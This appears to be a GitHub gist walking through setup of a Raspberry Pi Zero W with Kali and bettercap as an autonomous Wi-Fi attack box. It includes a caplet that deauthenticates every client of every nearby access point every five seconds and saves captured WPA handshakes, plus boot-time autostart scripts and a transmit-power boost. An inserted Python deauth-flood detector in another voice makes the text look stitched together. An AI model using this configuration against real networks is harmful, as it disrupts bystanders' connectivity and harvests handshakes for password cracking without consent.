@milesoberstadt
Last active February 4, 2022 07:18

PITA Install Documentation

Intro

These are some thoughts on getting evilsocket's PITA setup working on Kali in 2019. evilsocket is an absolute badass hacker; he wrote bettercap, which integrates some of his other projects. He wrote this up in 2018, but I think the re4son kernel and Kali have changed enough since then to break some of it. This is a WIP of my journey to get something similar working.

Issues with the original article

I wanted to reproduce the exact setup: get a Pi Zero W running with bettercap installed, and use a Bluetooth PAN for management. There are a few obvious benefits to this setup.

  1. No extra hardware needed! This frees the USB data port up for becoming a USB Ethernet gadget or for plugging something else in (GPS? RF radio?)
  2. Bluetooth isn't susceptible to deauth attacks the way a WiFi management AP would be.

Unfortunately, I haven't been able to get a Bluetooth PAN working with Kali (as of the 2019.02 image). evilsocket briefly mentions this in a tweet I can't find: the way the nexmon drivers interact with the re4son kernel has some parts that don't fit together perfectly.

Fix the Bluetooth configuration file /etc/systemd/system/bluetooth.target.wants/bluetooth.service by disabling the SAP plugin that would break Bluetooth; change the ExecStart part to...

I tried both his method for getting a BT PAN set up and a script I found here, but I couldn't get either to connect reliably. Maybe it's my gear, or I'm missing something important. I even tried the StickyFingers build of Kali and couldn't get that working either. I'll keep trying to get this part working, as it seems to be an optimal solution.

Installing from Kali

  1. Download Kali Linux RPi0w Nexmon.
  2. Write the image to your microSD card with etcher or dd.
  3. Plug in your Pi; preferably use an Ethernet adapter or wireless to connect your Pi to your home WiFi.
  4. SSH into your device using the default root password (toor).
  5. Issue these commands:
# always change the default root password
passwd
# regenerate ssh keys
ssh-keygen
# set a nicer hostname :D
hostname -b pita
echo pita > /etc/hostname
echo "127.0.0.1 pita" >> /etc/hosts
# update the system
apt update
apt upgrade
# install a few useful packages and setup swap
apt install git dphys-swapfile
# set CONF_SWAPSIZE to 1024
echo "CONF_SWAPSIZE=1024" >> /etc/dphys-swapfile
systemctl enable dphys-swapfile
# set the correct timezone
dpkg-reconfigure tzdata
# reboot to apply the effects
reboot
  6. Install Go and more dependencies. Note the single quotes on the PATH line: with double quotes the shell would expand $PATH and $GOPATH at the time of the echo (GOPATH isn't set in the current shell yet), writing a broken, fixed PATH into .bashrc.
apt install -y golang libpcap-dev libusb-1.0-0-dev hostapd
echo 'export GOPATH=/root/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
  7. Install bettercap using the instructions here.
  8. Get the StickyFingers tools:
cd ~
git clone https://github.com/Re4son/Kali-Pi
  9. Install bettercap caplets:
bettercap -eval "caplets.update; ui.update; q"
  10. Configure your management AP settings:
nano ~/Kali-Pi/Menus/RAS-AP/ras-ap.conf

Change ignore_broadcast_ssid=1 to ignore_broadcast_ssid=0 so the AP is visible.

Change your ssid and wpa_passphrase to whatever you like.

  11. Create an empty file at /usr/bin/nexutil so that ~/Kali-Pi/Menus/RAS-AP/ras-ap.sh brings up a monitor interface:
touch /usr/bin/nexutil
  12. Create a cert for bettercap's https-ui (I couldn't figure out why the auto-generate function wasn't working; maybe I'll look into that):
openssl req -x509 -nodes -sha256 -newkey rsa:2048 -keyout .bettercap-https.key.pem -out .bettercap-https.cert.pem -days 3650 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"
  13. Change your username and password in /usr/local/share/bettercap/caplets/https-ui.cap.
  14. Make some changes to the pita caplet.

I had issues with the !monstop and !monstart commands crashing this caplet, so I commented them out; monitor mode is handled in my startPita.sh script instead. I also added deauth skip lines to make sure your management interface isn't getting blasted too. Here's what my updated file looks like:

# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392

set $ {bold}😈 » {reset}

# make sure wlan0 is in monitor mode
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
#!monstop
#!monstart

# every 5 seconds:
# - clear the screen
# - show the list of nearby access points
# - deauth every client from each one of them
set ticker.period 5
# CHANGE THIS TO YOUR AP MAC ADDRESS (ifconfig wlan0)
set wifi.deauth.skip 00:11:22:33:44:55
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap

# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3
wifi.recon on
ticker on
net.sniff on

# we'll see lots of probes after each deauth, just skip the noise ...
events.ignore wifi.client.probe
# start fresh
events.clear
clear
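The caplet above deauths every client of every visible AP every 5 seconds, which from the defender's side is a very regular, easy-to-spot signature. As an added example (my own, not part of this gist or of bettercap), this Python snippet parses raw 802.11 management frames, counts deauthentication frames per BSSID inside a sliding time window, and flags the BSSIDs being flooded; the frames, timestamps and MAC addresses are constructed in the script, nothing is captured or transmitted.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame):
    """(subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:          # frame type 0 = management
        return None
    subtype = fc0 >> 4                  # 12 = deauthentication
    reason = struct.unpack_from("<H", frame, 24)[0] if len(frame) >= 26 else None
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample frame for this demo only; it is never sent anywhere."""
    tomac = lambda s: bytes(int(x, 16) for x in s.split(":"))
    hdr = bytes([0xC0, 0x00, 0, 0])    # FC: type 0 subtype 12, flags 0, duration 0
    return hdr + tomac(dst) + tomac(src) + tomac(bssid) + b"\x00\x00" + struct.pack("<H", reason)

def detect_deauth_flood(frames, window=10.0, threshold=3):
    """frames: iterable of (timestamp_seconds, raw_80211_bytes). Returns
    {bssid: total_deauths} for BSSIDs with >= threshold deauths in one window."""
    seen = defaultdict(list)
    for ts, raw in frames:
        p = parse_mgmt(raw)
        if p and p[0] == 12:
            seen[p[3]].append(ts)
    alerts = {}
    for bssid, times in seen.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the window's left edge
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts[bssid] = len(times)
                break
    return alerts

# Constructed sample: one AP (MAC made up) hit by a broadcast deauth every 5 s,
# matching the caplet's ticker.period; another AP sends one ordinary targeted deauth.
AP, OTHER = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
SAMPLE = [(5.0 * i, build_deauth(BROADCAST, AP, AP)) for i in range(3)]
SAMPLE.append((3.0, build_deauth("de:ad:be:ef:00:01", OTHER, OTHER, reason=3)))
```

Feeding real frames in requires stripping the radiotap header first; detect_deauth_flood(SAMPLE) flags only the AP that is being flooded.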

Putting together an init.d startup script

Create your init script (/etc/init.d/pita-startup):

#!/bin/bash
### BEGIN INIT INFO
# Provides:       pita-startup
# Required-Start:    $local_fs $remote_fs $network $syslog $named
# Required-Stop:     $local_fs $remote_fs $network $syslog $named
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: starts pita-startup
# Description:       starts pita-startup using start-stop-daemon
### END INIT INFO
/usr/bin/screen -dm -S bettercap /root/startPita.sh

Make it executable:

chmod +x /etc/init.d/pita-startup

Install it:

update-rc.d pita-startup defaults

Create your startup script (startPita.sh, which the init script above expects at /root/startPita.sh); it should look something like this:

#!/bin/bash
# This is getting called from /etc/init.d/pita-startup
export MENUDIR=/root/Kali-Pi/Menus
# bring up the management AP with the StickyFingers RAS-AP helper
/root/Kali-Pi/Menus/RAS-AP/ras-ap.sh start
sleep 5
# if a second wireless card (wlan1) is present, give it a monitor interface
# and run bettercap on it, leaving wlan0 to the management AP
if grep -q "wlan1" /proc/net/dev; then
        iw phy phy1 interface add mon1 type monitor
        ifconfig mon1 up
        bettercap -iface wlan1 -caplet https-ui
else
        bettercap -caplet https-ui
fi

Make it executable:

chmod +x startPita.sh

Setting TX Power to 30 dBm

I was using this guide here to get my Alfa card to do this. In order to build wireless-regdb, I needed to apt install python-m2crypto and pip install future. That solved the compile issues; other than that, the article worked correctly.
